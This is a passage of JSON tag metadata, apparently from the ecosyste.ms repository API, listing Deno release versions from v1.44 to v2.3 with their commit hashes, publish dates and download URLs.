syste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2